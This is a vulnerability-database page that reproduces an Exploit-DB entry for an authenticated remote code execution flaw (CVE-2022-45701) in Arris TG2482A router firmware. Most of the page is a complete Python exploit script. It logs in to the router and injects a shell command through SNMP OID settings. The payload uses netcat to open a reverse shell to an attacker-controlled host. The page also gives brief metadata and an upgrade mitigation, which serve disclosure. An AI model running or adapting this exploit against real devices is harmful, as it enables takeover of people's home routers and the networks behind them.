Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)

vendor:

TG2482A

by:

Yerodin Richards

8.8

CVSS

HIGH

Remote Code Execution (RCE)

CWE

Product Name: TG2482A

Affected Version From: 9.1.0103

Affected Version To: 9.1.0103

Patch Exists: YES

Related CWE: CVE-2022-45701

CPE: h:arris:tg2482a

Metasploit:

Other Scripts:

Platforms Tested: TG2482A, TG2492, SBG10

2022

Arris Router Firmware 9.1.103 – Remote Code Execution (RCE) (Authenticated)

An authenticated remote code execution vulnerability exists in Arris Router Firmware 9.1.103. An attacker can send a malicious payload to the router via SNMP to execute arbitrary code on the vulnerable device. This exploit was tested on TG2482A, TG2492, and SBG10 devices.

Mitigation:

Upgrade to the latest version of Arris Router Firmware.

Source

Exploit-DB raw data:

# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)
# Date: 17/11/2022
# Exploit Author: Yerodin Richards
# Vendor Homepage: https://www.commscope.com/
# Version: 9.1.103
# Tested on: TG2482A, TG2492, SBG10
# CVE : CVE-2022-45701

import requests
import base64

router_host = "http://192.168.0.1"
username = "admin"
password = "password"

lhost = "192.168.0.6"
lport = 80


def main():
    print("Authorizing...")
    cookie = get_cookie(gen_header(username, password))
    if cookie == '':
        print("Failed to authorize")
        exit(-1)
    print("Generating Payload...")
    payload = gen_payload(lhost, lport)
    print("Sending Payload...")
    send_payload(payload, cookie)
    print("Done, check shell..")

def gen_header(u, p):
    return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")

def no_encode_params(params):
    return  "&".join("%s=%s" % (k,v) for k,v in params.items())

def get_cookie(header):
    url = router_host+"/login"
    params = no_encode_params({"arg":header, "_n":1})
    resp=requests.get(url, params=params)
    return resp.content.decode('UTF-8')

def set_oid(oid, cookie):
    url = router_host+"/snmpSet"
    params = no_encode_params({"oid":oid, "_n":1})
    cookies = {"credential":cookie}
    requests.get(url, params=params, cookies=cookies)

def gen_payload(h, p):
    return f"$\(nc%20{h}%20{p}%20-e%20/bin/sh)"

def send_payload(payload, cookie):
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;", cookie)
    set_oid(f"1.3.6.1.4.1.4115.1.20.1.1.7.2.0={payload};4;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;", cookie)
    set_oid("1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;", cookie)
    

if __name__ == '__main__':
    main()